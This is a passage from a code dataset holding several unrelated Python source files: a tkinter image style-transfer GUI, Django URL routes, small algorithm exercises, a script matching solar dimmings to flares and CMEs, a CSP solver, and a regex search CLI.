window\",bg='black', fg='white',command=lambda:quit())\r\nbtn5.place(relx=0.65,rely=0.7, relwidth=0.3,relheight=0.1)\r\n\r\n###########################\r\n\r\ndef addphoto():\r\n Root1 = tkinter.Tk()\r\n Root1.withdraw() # Hide the Tkinter.Tk() instance\r\n default_dir = \"content\"\r\n if os.path.isfile(r'output\\1.jpg'):\r\n os.remove(r'output\\1.jpg')\r\n file_path = tkinter.filedialog.askopenfilename(title=u'select file', initialdir=(os.path.expanduser(default_dir)))\r\n image = Image.open(file_path)\r\n image.save(r'output\\1.jpg')\r\n \r\n###########################\r\ndef addstyle():\r\n Root1 = tkinter.Tk()\r\n Root1.withdraw() # Hide the Tkinter.Tk() instance\r\n default_dir = \"styles\"\r\n if os.path.isfile(r'output\\2.jpg'):\r\n os.remove(r'output\\2.jpg')\r\n file_path = tkinter.filedialog.askopenfilename(title=u'select file', initialdir=(os.path.expanduser(default_dir)))\r\n image = Image.open(file_path)\r\n image.save(r'output\\2.jpg')\r\n tkimage = ImageTk.PhotoImage(image)\r\n myvar=Label(Root1,image = tkimage)\r\n myvar.image = tkimage\r\n myvar.pack()\r\n################################## \r\ndef tensor_to_image(tensor):\r\n tensor = tensor*255\r\n tensor = np.array(tensor, dtype=np.uint8)\r\n if np.ndim(tensor)>3:\r\n assert tensor.shape[0] == 1\r\n tensor = tensor[0]\r\n return PIL.Image.fromarray(tensor)\r\n##########################################################\r\ndef bb(i1):\r\n content_path = r'output\\1.jpg'\r\n style_path = r'output\\2.jpg'\r\n content_image = load_img(content_path)\r\n style_image = load_img(style_path)\r\n hub_model = hub.load('magenta_arbitrary-image-stylization-v1-256_2')\r\n stylized_image = hub_model(tf.constant(content_image), tf.constant(style_image))[0]\r\n tensor_to_image(stylized_image)\r\n l=str(i1)\r\n tensor_to_image(stylized_image).save(\"finaloutput/\"+l+\".jpg\")\r\n global i\r\n i+=1\r\n \r\n####################################\r\ndef load_img(path_to_img):\r\n \r\n img2 = tf.io.read_file(path_to_img)\r\n img2 = tf.image.decode_image(img2, channels=3)\r\n img2 = tf.image.convert_image_dtype(img2, tf.float32)\r\n shape = tf.cast(tf.shape(img2)[:-1], tf.float32)\r\n max_dim = 900\r\n long_dim = max(shape)\r\n scale = max_dim / long_dim\r\n new_shape = tf.cast(shape * scale, tf.int32)\r\n img2 = tf.image.resize(img2, new_shape)\r\n img2 = img2[tf.newaxis, :]\r\n return img2\r\n##########################################################\r\ndef printer1():\r\n Root2 = tkinter.Tk()\r\n Root2.withdraw() # Hide the Tkinter.Tk() instance\r\n default_dir = \"finaloutput\"\r\n file_path = tkinter.filedialog.askopenfilename(title=u'select file', initialdir=(os.path.expanduser(default_dir)))\r\n image = Image.open(file_path)\r\n im_width, im_height = image.size\r\n if im_width > im_height:\r\n image = image.rotate(90)\r\n image.thumbnail((im_height, im_width), Image.ANTIALIAS)\r\n printer.printImage(image, False)\r\n printer.justify('C')\r\n printer.setSize('S')\r\n printer.println(\"PolaPi-Zero\")\r\n printer.feed(3)\r\n##################################################################\r\ndef quit():\r\n root.destroy()\r\n \r\n\r\nmainloop()\r\n","repo_name":"GhaithAli1997/Artistic-Style","sub_path":"test/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":5469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30030445429","text":"from django.conf.urls import url\nfrom . 
import views\n\n\nurlpatterns = [\n # inicio\n url(r'^inicio', views.buscar_por_cliente, name='index'),\n\n # resultado busqueda por letra\n url(r'^browse/(?P[-\\w]+)/$', views.browse, name='browse'),\n\n # ########################## Cliente ########################## #\n\n # Crear cliente\n url(r'^crear_cliente/$', views.crear_cliente, name='crear_cliente'),\n\n # detalle del cliente\n url(r'^detalle/(?P[-\\w]+)/$', views.detalle_cliente, name='detalleCliente'),\n\n # buscar la orden\n url(r'^cliente/buscar/$', views.buscar_por_cliente, name='buscar_por_cliente'),\n\n # Borrar cliente\n url(r'^detalle/(?P[-\\w]+)/edit/borrar/$', views.borrar_cliente, name='borrarCliente'),\n\n # alerta Borrar cliente\n url(r'^detalle/(?P[-\\w]+)/edit/alerta/$', views.alerta_borrar_cliente, name='alertaBorrarCliente'),\n\n # editar cliente\n url(r'^detalle/(?P[-\\w]+)/edit/$', views.editar_cliente, name='editarCliente'),\n\n # ########################## Orden ########################## #\n\n # crear la orden\n url(r'^crear_orden/(?P[-\\w]+)/$', views.crear_orden, name='crear_orden'),\n\n # detalle de la orden\n url(r'^orden/(?P[-\\d]+)/$', views.detalle_orden, name='orden'),\n\n # editar la orden\n url(r'^orden/(?P[-\\d]+)/edit/$', views.editar_orden, name='editarOrden'),\n\n # buscar la orden\n url(r'^orden/buscar/$', views.buscar_por_ordenes, name='buscar_por_ordenes'),\n\n # alerta Borrar orden\n url(r'^orden/(?P[-\\d]+)/edit/alerta/$', views.alerta_borrar_orden, name='alertaBorrarOrden'),\n\n # borrar la orden\n url(r'^orden/(?P[-\\d]+)/borrar/$', views.borrar_orden, name='borrarOrden'),\n\n # ########################## Trabajo ########################## #\n\n # crear trabajo\n url(r'^crear_trabajo/(?P[-\\d]+)/$', views.crear_trabajo, name='crear_trabajo'),\n\n # detalle trabajo\n url(r'^trabajo/(?P[-\\d]+)/$', views.detalle_trabajo, name='trabajo'),\n\n # editar trabajo\n url(r'^trabajo/(?P[-\\d]+)/edit/$', views.editar_trabajo, name='editar_trabajo'),\n\n # alerta Borrar trabajo\n url(r'^trabajo/(?P[-\\d]+)/edit/alerta/$', views.alerta_borrar_trabajo, name='alerta_borrar_trabajo'),\n\n # borrar trabajo\n url(r'^trabajo/(?P[-\\d]+)/borrar/$', views.borrar_trabajo, name='borrar_trabajo'),\n\n\n # calculadora de precios\n url(r'^calculador/$', views.calculador, name='calculador'),\n\n # contacto\n url(r'^contacto/$', views.contacto, name='contacto'),\n\n]","repo_name":"Alialmandoz/ArchivoImprimirWebApp","sub_path":"cliente/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"41524282719","text":"import math\ndef polynomial (a, b, c):\n delta = (b**2) - 4*a*c\n if delta<0:\n delta = math.sqrt(delta*(-1))\n p1 = round(-b/(2*a), 2)\n p2 = round(delta/(2*a), 2)\n s_x1 = str(p1) + ' + ' + str(p2) + 'i'\n s_x2 = str(p1) + ' - ' + str(p2) + 'i' \n return s_x1, s_x2\n else:\n delta = math.sqrt(delta)\n x1 = round((-b + delta)/(2*a), 2)\n x2 = round((-b - delta)/(2*a), 2)\n return x1, x2\n\na = int(input(\"Type the a parameter: \"))\nb = int(input(\"Type the b parameter: \"))\nc = int(input(\"Type the c parameter: \"))\nx1, x2 = polynomial(a, b, c)\n\nprint(f\"\\nFunction's law is: {a}x^2 + {b}x + {c}\")\nprint(f\"The function roots are {x1} and {x2} .\\n\")","repo_name":"MouraCtrlSF6/Python_Learning","sub_path":"Exercises/SquareFunction.py","file_name":"SquareFunction.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"43916992081","text":"#User function Template for python3\n\nclass Solution:\n \n #Function to find length of shortest common supersequence of two strings.\n def shortestCommonSupersequence(self, X, Y, m, n):\n return m + n - self.lcs(X, Y)\n \n def lcs(self, w1, w2):\n n1, n2 = len(w1), len(w2)\n dp = [0] * (n2 + 1)\n \n for i in range(1, n1 + 1):\n temp = [0] * (n2 + 1)\n for j in range(1, n2 + 1):\n if w1[i - 1] == w2[j - 1]:\n temp[j] = dp[j - 1] + 1\n else:\n temp[j] = max(dp[j], temp[j - 1])\n dp = temp\n \n return dp[n2]\n\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\n#contributed by RavinderSinghPB\nif __name__ == '__main__': \n t=int(input())\n for tcs in range(t):\n X,Y=input().split()\n \n print(Solution().shortestCommonSupersequence(X,Y,len(X),len(Y)))\n \n# } Driver Code Ends","repo_name":"robinsdeepak/leetcode","sub_path":"Shortest Common Supersequence - GFG/shortest-common-supersequence.py","file_name":"shortest-common-supersequence.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"72723946344","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 3 16:02:21 2016\n\n@author: alyshareinard\n\"\"\"\n\nfrom datetime import timedelta, datetime\nimport math\nimport os\nimport numpy as np\nimport pandas as pd\nimport get_yashiro_catalog as CMEs\nfrom get_flare_catalog import get_flare_catalog\nfrom read_Lars_peakdim import read_Lars_peakdim\n\nglobal data_path\ndata_path=os.path.join(os.path.dirname(os.path.realpath(__file__)), \"data\")\n\ndef determine_best_flare(time_match, big_match, verbose=False):\n \"\"\"This is where the logic is for choosing the best flare when the flare 
The inputs are the time difference \n between the biggest flare and the dimming (big_diff), the time difference \n between the closest flare in time and the dimming (time_diff), the size of \n the biggest flare (big_size) and the size of the flare closest in \n time (time_size) and the indices for each (big_ind and time_ind)\"\"\"\n \n if verbose==True:\n print(\"Time difference from biggest flare to dimming: \", big_match[\"time_diff\"])\n print(\"Time difference from closest flare in time to dimming: \", time_match[\"time_diff\"])\n if big_match[\"time_diff\"]biggest_size:\n biggest_index=index\n biggest_size=fl_size[index]\n biggest_mag=fl_mag[index]\n return biggest_index\n\ndef is_nat(npdatetime):\n \"\"\"program to determine if a date is not a time -- \n for picking out missing/fill values\"\"\"\n try:\n npdatetime.strftime('%x')\n return False\n except:\n return True\n \ndef create_datetime_cme(ymd, hm):\n date=[]\n #unpack ymd and fix year\n\n for item, ihm in zip(ymd, hm):\n\n if pd.isnull(item)==True:\n date.append(None)\n continue\n \n datestr=str(item).split(\"/\")\n year=int(datestr[0])\n month=int(datestr[1])\n day=int(datestr[2])\n# print(ihm)\n hms=ihm.split(\":\")\n hour=int(hms[0])\n minute=int(hms[1])\n\n try:\n date.append(datetime(year, month, day, hour, minute))\n\n except:\n print(year, month, day, hour, minute, \"is not a valid date, skipping\")\n date.append(None)\n return date\n \ndef create_datetime_flare(ymd, hm):\n \"\"\"create datetime for hand selected flare data\"\"\"\n \n date=[]\n #unpack ymd and fix year\n\n for item, ihm in zip(ymd, hm):\n\n if item==\" \" or np.isnan(item)==True:\n date.append(None)\n continue\n \n datestr=str(item)\n year=int(datestr[0:2])\n month=int(datestr[2:4])\n day=int(datestr[4:6])\n\n #fix two year dates without messing up 4 year dates\n if year<70: \n year=year+2000\n elif year<100: \n year+=1900\n \n if math.isnan(ihm)==False:\n hour=math.floor(ihm/100)\n minute=math.floor(ihm-hour*100)\n\n #now check to see if the time is past 2400 and adjust\n if hour>=24:\n hour-=24\n day+=1\n [day, month, year]=check_daymonth(day, month, year)\n\n try:\n date.append(datetime(year, month, day, hour, minute))\n# print(\"CHECKIT\", date[-1])\n except:\n print(year, month, day, hour, minute, \"is not a valid date, skipping\")\n date.append(None)\n else:\n date.append(None)\n return date\n \ndef read_hand_flares():\n \"\"\"reads in file containing the flares chosen by hand\"\"\"\n \n file=os.path.join(data_path, \"dim_flare_hand.txt\")\n \n names=[\"dim_name\", \"date\", \"start\", \"end\", \"peak\", \"loc\", \"flare_class\", \n \"flare_size\", \"station\", \"something\", \"AR\", \"LarAR\"]\n data=pd.read_csv(file, sep=\" \", header=None, names=names)\n\n data[\"init_date\"]=create_datetime_flare(data[\"date\"], data[\"start\"])\n data[\"peak_date\"]=create_datetime_flare(data[\"date\"], data[\"peak\"])\n data[\"final_date\"]=create_datetime_flare(data[\"date\"], data[\"end\"]) \n\n data[\"date\"]=data[\"peak_date\"]\n return data\n \ndef read_hand_cmes():\n \"\"\"reads in file containing the CMEs chosen by hand\"\"\"\n\n file=os.path.join(data_path, \"dim_cme_hand.txt\")\n \n names=[\"dim_name\", \"date\", \"time\", \"PA\", \"width\", \"speed_lin\", \"speed_20init\", \n \"speed_20final\", \"speed_2020\", \"accel\", \"mass\", \"ke\", \"mpa\"]\n data=pd.read_csv(file, sep=\" \", header=None, names=names)\n# print(\"all the times\", data)\n data[\"date\"]=create_datetime_cme(data[\"date\"], data[\"time\"])\n# print(data[\"date\"])\n return 
data\n\ndef calc_loc_diff(flare_loc, dim_ns, dim_ew):\n \"\"\"takes a flare coordinate location and a dimming NS and EW and determines\n the cartesian distance between the dimming and flare\"\"\"\n if flare_loc !=None and type(flare_loc)==str: \n \n ns=int(flare_loc[1:3])\n if flare_loc[0]==\"S\": ns=-ns\n ew=int(flare_loc[4:6])\n if flare_loc[3]==\"E\": ew=-ew\n \n ns_diff=ns-dim_ns\n ew_diff=ew-dim_ew\n\n ##this is kind of a cludge -- assumes 2D not 3D -- not sure a more robust method is necessary\n dist=math.sqrt(ns_diff*ns_diff+ew_diff*ew_diff)\n return dist\n else:\n return None\n\ndef compare_flare_hand(target, auto, events, conf):\n \"\"\"steps through dimmings and compares the auto matches to the hand matches\"\"\"\n \n hand_matches=read_hand_flares() \n\n ind2=0\n mat=[]\n \n for index in range(len(target[\"date\"])):\n while target[\"dim_name\"][index][0:13]!=hand_matches[\"dim_name\"][ind2][0:13]:\n ind2=ind2+1 \n\n if ind2>len(hand_matches)-1:\n break\n\n mat.append(ind2) \n \n [same, diff, auto_nohand, hand_noauto, null] = calc_overall_stats(auto['date'], conf, mat, hand_matches['date'], target[\"dim_name\"]) \n \n print(\" \")\n print(\" \")\n print(\"Overall statistics\")\n print(\"same flare: \", same)\n print(\"same null: \", null)\n print(\"hand match but no automated match\", hand_noauto)\n print(\"automated match but no hand match\", auto_nohand)\n print(\"diff: \", diff)\n print(\"accuracy: \", 100*round((same+null)/(same+null+diff+hand_noauto+auto_nohand), 3), \"%\")\n \n #make a location mask\n is_location=[]\n for ind in range(len(auto)):\n if ind==None: #if there is no match\n is_location.append(False) ###determines whether nulls go into no location or location piles\n elif auto['location'][ind]==None:\n is_location.append(False)\n else:\n is_location.append(True)\n \n auto_loc=[]\n conf_loc=[]\n mat_loc=[]\n target_name_loc=[]\n\n #take only events with location\n auto_date=auto['date']\n for ind in range(len(is_location)):\n if is_location[ind]:\n auto_loc.append(auto_date[ind])\n conf_loc.append(conf[ind])\n mat_loc.append(mat[ind])\n target_name_loc.append(target[\"dim_name\"][ind])\n \n [same, diff, auto_nohand, hand_noauto, null] = calc_overall_stats(auto_loc, conf_loc, mat_loc, hand_matches[\"date\"], target_name_loc)\n \n print(\" \")\n print(\" \")\n print(\"When we know the location\") \n print(\"Overall statistics\")\n print(\"same flare: \", same)\n print(\"same null: \", null)\n print(\"hand match but no automated match\", hand_noauto)\n print(\"automated match but no hand match\", auto_nohand)\n print(\"diff: \", diff)\n print(\"accuracy: \", 100*round((same+null)/(same+null+diff+hand_noauto+auto_nohand), 3), \"%\")\n \n \ndef compare_cme_hand(target, auto, events, conf):\n \"\"\"steps through dimmings and compares the auto matches to the hand matches\"\"\"\n \n hand_matches=read_hand_cmes() \n ind2=0\n mat=[]\n \n for index in range(len(target[\"date\"])):\n\n\n while target[\"dim_name\"][index][0:13]!=hand_matches[\"dim_name\"][ind2][0:13]:\n ind2=ind2+1 \n\n if ind2>len(hand_matches)-1:\n break\n\n mat.append(ind2) \n \n [same, diff, auto_nohand, hand_noauto, null] = calc_overall_stats(auto['date'], conf, mat, hand_matches['date'], target[\"dim_name\"]) \n \n print(\" \")\n print(\" \")\n print(\"Overall statistics\")\n print(\"same CME: \", same)\n print(\"same null: \", null)\n print(\"hand match but no automated match\", hand_noauto)\n print(\"automated match but no hand match\", auto_nohand)\n print(\"different CME: \", diff)\n 
print(\"accuracy: \", 100*round((same+null)/(same+null+diff+hand_noauto+auto_nohand), 3), \"%\")\n \ndef flare_size(mag, size):\n \"\"\" takes a flare magnitude and returns a decimal value indicating size\"\"\"\n\n if mag=='B':\n return size\n elif mag=='C':\n return size*10.\n elif mag=='M':\n return size*100.\n elif mag=='X':\n return size*1000.\n else:\n print(\"flare size not valid\")\n return None \n \ndef coord2pa(ew_coord, ns_coord):\n \"\"\"routine to translate ew/ns coordinates into position angle\"\"\"\n \n x=ew_coord*1.0\n y=ns_coord*1.0\n if y!=0:\n pa=np.arctan(-x/y)\n else:\n pa=3.1415926/2. #limit of arctan(infinity)\n\n pa=pa*180.0/3.1415926\n\n if y<0:\n pa=pa+180 \n if pa<0:\n pa=pa+360\n \n if x==0 and y==0:\n pa=-1\n\n return pa\n \ndef match_dimmings_flaresCMEs(event_type='flares', print_results=False, hand_compare=False, training=False, start_year=2013, end_year=2017):\n \"\"\"This is the main program. The inputs are several keywords\n \n event_type: which can be 'cmes' or 'flares'\n print_results: whether you get a printout of all the target dimmings/auto matches/hand matches\n hand_compare: whether you want to compare with a hand drawn list\n training: whether you want to take a portion of the data for training purposes or all of it\n \n Given that the program reads in the dimming data and the CME or flare data and does the automatching\n \n at the top of the file are some configurable parameters. \n FDmaxDist: maximum distance in degrees that the routine will look for an associated flare\n CDmaxAngle: maximum angle in degrees that the routine will look for an associated CME\n Fmaxhours: maximum number of hours positive/negative that the routine will look for an associated flare\n Cmaxhours_before: maximum number of hours positive/negative that the routine will look for an associated CME\n Cmaxhours_after: maximum number of hours after the dimming that the routine will look for an associated CME\n \"\"\"\n \n FDmaxDist=20\n CDmaxAngle=45\n Cmaxhours_before=4\n Cmaxhours_after=2\n Fmaxhours_before=4\n Fmaxhours_after=2\n \n if event_type==\"flares\":\n timeafter=timedelta(hours=Fmaxhours_after)\n timebefore=timedelta(hours=Fmaxhours_before)\n elif event_type==\"cmes\": \n timeafter=timedelta(hours=Cmaxhours_after)\n timebefore=timedelta(hours=Cmaxhours_before)\n \n dimmings=read_Lars_peakdim(data_path, training=training)\n if event_type=='flares':\n (events, ha_notimplemented)=get_flare_catalog(data_path, start_year, end_year)\n events['date']=events['peak_date'] #this can be used to chose initial_date if needed -- need to also change in read_hand_flares\n elif event_type == 'cmes':\n events=CMEs.get_yashiro_catalog(data_path)\n else:\n print(\"not a valid event selection\")\n \n #first check to make sure there is some overlap in dates\n min_dimtime=min(dimmings['date'])\n max_dimtime=max(dimmings['date'])\n \n min_event=min(events['date'])\n max_event=max(x for x in events['date'] if x is not None)\n \n print(\"\\nEvent times:\", min_event, max_event)\n print(\"Dimming times:\", min_dimtime, max_dimtime)\n \n if ((min_eventmin_dimtime) or (min_eventmax_dimtime)):\n print(\"Event times overlap with dimming times, calculating matches\")\n else:\n print(\"event_times do not overlap with dimming times, returning\")\n return 0\n \n\n #let's start with stepping through the dimmings\n match_time=[]\n match_dist=[]\n match_big=[]\n target_time=[]\n target_name=[]\n\n for ind1 in range(len(dimmings['date'])):\n\n dim_ew=dimmings['mean_EW'][ind1]\n 
dim_ns=dimmings['mean_NS'][ind1]\n \n target_time.append(dimmings['date'][ind1])\n target_name.append(dimmings['dim_name'][ind1])\n\n possibilities=[]\n distance=[]\n \n #we loop over all the events and create arrays for match_time, match_big, match_dist -- these may not be the same\n for ind2 in range(len(events['date'])):\n \n dimtime=dimmings['date'][ind1]\n# print(\"ind2\", ind2, len(events['date']))\n eventtime=events['date'][ind2]\n\n\n if eventtime !=None and eventtime<(dimtime+timeafter) and eventtime>(dimtime-timebefore):\n #now check location\n if event_type=='flares':\n event_loc=events['location'][ind2]\n\n dist=calc_loc_diff(event_loc, dim_ns, dim_ew)\n\n if dist == None or dist1:\n\n dist=[]\n time_diff=[]\n event_size=[]\n\n for x in possibilities:\n\n t_diff=(dimtime - events['date'][x])\n time_diff.append(round((t_diff.days*86400+t_diff.seconds)/60./60., 2))\n\n if event_type=='flares':\n\n event_size.append(flare_size(events['xray_class'][x], events['xray_size'][x]))\n if event_type==\"cmes\":\n event_size.append(events[\"mass\"][x])\n \n biggest=event_size.index(max(event_size)) #index of the largest event in the small \n# print(\"these are the sizes\", event_size)\n# print(\"this is the biggest\", biggest)\n match_big.append(possibilities[biggest])\n\n\n tdiff_absfloat=[abs(float(x)) for x in time_diff]\n shortest_time=tdiff_absfloat.index(min(tdiff_absfloat))\n\n\n dist_exists=False\n for val in dist:\n if val!=None:\n dist_exists=True\n \n if len(dist)>0 and dist_exists: \n shortest_dist=dist.index(min(dist))\n else:\n shortest_dist=None\n\n match_time.append(possibilities[shortest_time])\n if shortest_dist==None:\n match_dist.append(None)\n elif shortest_dist==shortest_time:\n match_dist.append(None)\n else:\n match_dist.append(possibilities[shortest_dist]) \n\n #now we've finished determining the match that's closest in time, distance, and the largest, \n #so we use determine_conf_best_xxx to find the best match. 
\n conf=[]\n auto=[]\n nulls=[None for x in events.keys()] #fill value for events with no matches\n\n \n# #initialize match dataframe -- we\n# if event_type==\"flares\":\n# (best, confidence)= determine_conf_best_flare(match_time[0], match_big[0], match_dist[0], target_time[0], events)\n# elif event_type==\"cmes\":\n# (best, confidence)= determine_conf_best_cme(match_time[0], match_big[0], match_dist[0], target_time[0], events)\n# conf=[confidence]\n# auto=[best]\n matches=[]\n\n\n for index in range(len(target_time)): \n if event_type==\"flares\":\n (best, confidence)=determine_conf_best_flare(match_time[index], match_big[index], match_dist[index], target_time[index], events)\n elif event_type==\"cmes\":\n (best, confidence)= determine_conf_best_cme(match_time[index], match_big[index], match_dist[index], target_time[index], events)\n conf.append(confidence)\n auto.append(best)\n\n if best !=None:\n matches.append(events.iloc[best].tolist())\n else:\n matches.append(nulls)\n\n matches=pd.DataFrame(matches, columns=events.keys())\n if event_type==\"flares\":\n output_summary_flares(dimmings, matches)\n elif event_type==\"cmes\":\n output_summary_cmes(dimmings, matches)\n\n if print_results==True and event_type==\"flares\":\n print_summary_flares(dimmings, events, matches, hand=hand_compare)#, event_type=event_type)\n elif print_results==True and event_type==\"cmes\":\n print_summary_cmes(dimmings, events, matches, hand=hand_compare)\n\n if hand_compare==True and event_type==\"flares\":\n compare_flare_hand(dimmings, matches, events, conf)\n elif hand_compare==True and event_type==\"cmes\":\n compare_cme_hand(dimmings, matches, events, conf)\n\n\n\n return matches\n \n\n \nauto_matches=match_dimmings_flaresCMEs(event_type='flares', print_results=False, hand_compare=False, training=False, start_year=2010, end_year=2017)\n\n ","repo_name":"alyshareinard/dimmings","sub_path":"match_dimmings_flares.py","file_name":"match_dimmings_flares.py","file_ext":"py","file_size_in_byte":30226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"6012234195","text":"# from functools import reduce\nimport copy, random, numpy as np\nfrom collections import Counter\nimport functools\n\"\"\"\nnum - number of elements in csp, with or without constraints\nlinks - list \npossibleValues\n\"\"\"\ndef isUnique(link, vals):\n return not any([x != None and vals.count(x) > 1 for x in vals])\n\nclass CSP:\n def __init__(self, links, possibleValues=[], f=isUnique):\n self.num = len(set(np.concatenate(links)))\n self.links = links\n self.possibleValues = possibleValues\n self.nodesOpened = 0\n self.isConstraintOk = f\n def backtrack(self, assignment):\n #Extract non-assigned yet nodes\n nonasssigned=[el for el in assignment if el[0] is None]\n self.nodesOpened += 1\n if not nonasssigned:\n #we're done, everything assigned\n return [el[0] for el in assignment]\n #Choose the node with minimal number of possible values left. Thta's the node we will assign in this recursive call\n elIndex = assignment.index(min(nonasssigned, key = lambda x:len(x[1])))\n #Iterate over possible values on chosen node.\n for possibleValue in assignment[elIndex][1]:\n assignment[elIndex][0]=possibleValue\n relatedLinks=[el for el in self.links if elIndex in el]\n #Go through all unassigned nodes and do forward remove of impossible values due to constraint function\n #Have a map for forvard removed values to be able to rollback changes. 
Due to this we don't need to make copy of whole csp on each recursive call\n forwardRemove={}\n #Check if chosen possible value is not being constrained by 'isConstraintOk' function\n if all([self.isConstraintOk(link, [assignment[i][0] for i in link]) for link in relatedLinks]):\n #possible value can be assigned - let's do the forward check and remove all constrained values on neighbour nodes (after this assignment)\n for link in relatedLinks:\n for nodeIndex in link:\n if nodeIndex != elIndex and assignment[nodeIndex][0] == None:\n toRemove=[]\n for forwardValue in assignment[nodeIndex][1]:\n assignment[nodeIndex][0]=forwardValue\n if not self.isConstraintOk(link,[assignment[index][0] for index in link]):\n toRemove.append(forwardValue)\n assignment[nodeIndex][0]=None\n assignment[nodeIndex][1] = [el for el in assignment[nodeIndex][1] if el not in toRemove]\n if nodeIndex in forwardRemove:\n forwardRemove[nodeIndex] += toRemove\n else:\n forwardRemove[nodeIndex] = toRemove\n #Now, when forward check was done - let's go deeper into search tree with new assignemnt\n res = self.backtrack(assignment)\n #This will return a valid complete assignment when algorithm will reach the full valid assignment and recurse back.\n if not res is None:\n return res\n #Rollback changes done in this iteration (we get here only if the prvious path led us to conflict)\n assignment[elIndex][0]=None\n for el, removedItems in list(forwardRemove.items()):\n assignment[el][1]+=removedItems\n #There are no possible values for this node. Sad, but we went wrong way on search tree. Recurse back to previous tree leaf and try another path.\n return None\n #Prepare possible values for each of nodes in graph. Currently it is expected that all of them initially wil have the same set\n def solve(self):\n return self.backtrack([[None, self.possibleValues[:]] for l in range(self.num)])\n\n\"\"\"GRAPH\"\"\"\n# csp = CSP(6, ((0, 1), (0, 2), (0, 3), (1, 2), (1, 4), (1, 5), (2, 3), (2, 4), (3, 4), (3, 5), (4, 5)), ['r', 'b', 'g'])\n# print(csp.solve())\n# print('Nodes opened:',csp.nodesOpened)\n\n\"\"\"SUDOKU\"\"\"\n# Size of sudoku and how many % of numbers should be hidden\n# bs, hide = 4, 70\n# bs2, bs3, bs4=bs**2, bs**3, bs**4\n# links=[[a+bs2*i-1 for a in range(1, bs2+1)] for i in range(bs2)]+\\\n# [[a+bs2*i-1 for i in range(0, bs2)] for a in range(1, bs2+1)]+\\\n# list(np.concatenate([[np.concatenate([[x+bs2*i+bs*j+bs3*k-1 for x in range(1, bs+1)] for i in range(bs)]) for j in range(bs)] for k in range(bs)]))\n# vals = list(range(1, bs2+1))\n# random.shuffle(vals)\n# csp = CSP(links, vals)\n# solvedSudoku = csp.solve()\n# #Print res\n# print((np.array(solvedSudoku).reshape(bs2, bs2)))\n# for i in range(bs4*hide//100):\n# solvedSudoku[random.randint(0, bs4-1)]=''\n# print(np.core.defchararray.rjust(np.array(solvedSudoku).reshape(bs2, bs2), 3 ,' '))\n# print(('Nodes opened:',csp.nodesOpened))\n","repo_name":"samkowskiykostya/Algos","sub_path":"practical/csp.py","file_name":"csp.py","file_ext":"py","file_size_in_byte":4918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34888475139","text":"#!/usr/bin/env python3\nimport argparse\nimport re\n# The script demonstrates using of Factory method design pattern\n# where matcher using factory method and receives appropriate matcher based on the user flags\n\nman_page = \"\"\" \n Search Helper\n The script will find regex in the provided list of files to search in. 
\n and will print in the following format 'file_name line_number line'\n \n The flag -r is mandatory \n \n If --files parameter is missing, the script will take input from STDIN.\n When --files is provided it is mandatory to specify existing filename\n \n Example: Search any letter in STDIN >>>python3 SearchHelper.py -r [a-z]\n Example: Search any letter in provided Files >>>python3 SearchHelper.py -r [a-z] -f input.txt input2.txt\n \"\"\"\n\n# Output in the format: 'file_name line_number line'\nclass DefaultMatcher:\n\n def print_result(self, filename, file, pattern):\n for ind, line in enumerate(file):\n for match in re.finditer(pattern, line):\n print(\"{} {} {}\".format(filename, ind + 1, line))\n\n\n# Output in the format: 'file_name:line_number:start_position:matched_text'\nclass MachineMatcher:\n\n def print_result(self, filename, file, pattern):\n for ind, line in enumerate(file):\n for match in re.finditer(pattern, line):\n start = match.start()\n end = match.end()\n print(\"{}:{}:{}:{}\".format(filename, ind + 1, line, line[start:end]))\n\n\n# Output in the format: 'file_name line_number line' matched text is highlighted in color\nclass ColorMatcher:\n\n def print_result(self, filename, file, pattern):\n OKGREEN = '\\033[92m'\n ENDC = '\\033[0m'\n for ind, line in enumerate(file):\n for match in re.finditer(pattern, line):\n start = match.start()\n end = match.end()\n print(\"{} {} {}\".format(filename, ind + 1\n , line[:start] + OKGREEN + line[start:end] + ENDC + line[end:]))\n\n\n# Output in the format: 'file_name line_number line' '^' is printed underneath the matched text\nclass UnderLineMatcher:\n\n def print_result(self, filename, file, pattern):\n for ind, line in enumerate(file):\n for match in re.finditer(pattern, line):\n start = match.start()\n end = match.end()\n prefix = \"{} {} {}\".format(filename, (ind + 1), line[:start])\n suffix = \"{}\".format(line[end:])\n print(\"{}{}{}\".format(prefix, line[start:end], suffix))\n print(\"{}{}\".format(\" \" * len(prefix), \"^\" * len(line[start:end]) + \" \" * len(suffix)))\n\n\ndef matcher_factory(args):\n if args.underline:\n match = UnderLineMatcher()\n elif args.color:\n match = ColorMatcher()\n elif args.machine:\n match = MachineMatcher()\n else:\n match = DefaultMatcher()\n return match\n\n\ndef main(args):\n match = matcher_factory(args)\n if args.files:\n for file in args.files:\n match.print_result(file.name, file, args.regex)\n else:\n STDIN = input(\"Please add the content to search:\\n\")\n match.print_result('STDIN', STDIN.split('\\n'), args.regex)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(man_page)\n mandatory = parser.add_argument_group(\"mandatory arguments\")\n mandatory.add_argument(\"-r\", \"--regex\", required=True, help=\"the regular expression to search for.\")\n\n parser.add_argument(\"-f\", \"--files\", nargs='+', type=argparse.FileType('r'),\n help=\"a list of files to search in.\")\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-u\", \"--underline\", action=\"store_true\",\n help=\"'^' is printed underneath the matched text\")\n group.add_argument(\"-c\", \"--color\", action=\"store_true\",\n help=\"the matched text is highlighted in color [1].\")\n group.add_argument(\"-m\", \"--machine\", action=\"store_true\",\n help=\"print the output in the format: 'file_name:line_number:start_position:matched_text'.\")\n\n args = parser.parse_args()\n\n 
